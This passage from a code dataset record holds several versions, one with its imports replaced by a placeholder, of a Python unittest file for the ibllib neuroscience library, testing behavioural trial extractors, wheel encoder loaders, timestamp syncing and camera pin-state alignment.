17, 21, 25, 29, 33, 37, 41, 45, 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n\n # Remove injective assert\n matches = camera.attribute_times(tsa, tsb, injective=False, take='nearest')\n expected = np.array(\n [0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17, 18, 20, 21, 22,\n 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38, 40, 41, 42, 44, 45,\n 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60]\n )\n np.testing.assert_array_equal(matches, expected)\n\n # Check input validation\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\nif __name__ == \"__main__\":\n unittest.main(exit=False, verbosity=2)\n", "import functools\nimport shutil\nimport tempfile\nimport unittest\nimport unittest.mock\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\nimport one.alf.io as alfio\nfrom ibllib.io.extractors import training_trials, biased_trials, camera\nfrom ibllib.io import raw_data_loaders as raw\nfrom ibllib.io.extractors.base import BaseExtractor\n\n\ndef wheelMoves_fixture(func):\n \"\"\"Decorator to save some dummy wheelMoves ALF files for extraction tests\"\"\"\n\n @functools.wraps(func)\n def wrapper(obj=None):\n attr_list = ['training_lt5', 'training_ge5', 'biased_lt5', 'biased_ge5'\n ]\n alf_paths = [(getattr(obj, p)['path'] / 'alf') for p in attr_list]\n n_trials = [getattr(obj, p)['ntrials'] for p in attr_list]\n for p, n in zip(alf_paths, n_trials):\n p.mkdir()\n np.save(str(p / '_ibl_wheelMoves.intervals.npy'), np.zeros((n, 2)))\n np.save(str(p / '_ibl_wheelMoves.peakAmplitude.npy'), np.zeros(n))\n func(obj)\n for p in alf_paths:\n shutil.rmtree(p)\n return wrapper\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n def test_get_intervals(self):\n di = training_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = training_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n\n def tearDown(self):\n for f in self.main_path.rglob('_ibl_log.*.log'):\n f.unlink()\n [x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()\n ]\n [x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()\n ]\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\nif __name__ == '__main__':\n unittest.main(exit=False, verbosity=2)\n", "<import token>\n\n\ndef wheelMoves_fixture(func):\n \"\"\"Decorator to save some dummy wheelMoves ALF files for extraction tests\"\"\"\n\n @functools.wraps(func)\n def wrapper(obj=None):\n attr_list = ['training_lt5', 'training_ge5', 'biased_lt5', 'biased_ge5'\n ]\n alf_paths = [(getattr(obj, p)['path'] / 'alf') for p in attr_list]\n n_trials = [getattr(obj, p)['ntrials'] for p in attr_list]\n for p, n in zip(alf_paths, n_trials):\n p.mkdir()\n np.save(str(p / '_ibl_wheelMoves.intervals.npy'), np.zeros((n, 2)))\n np.save(str(p / '_ibl_wheelMoves.peakAmplitude.npy'), np.zeros(n))\n func(obj)\n for p in alf_paths:\n shutil.rmtree(p)\n return wrapper\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, 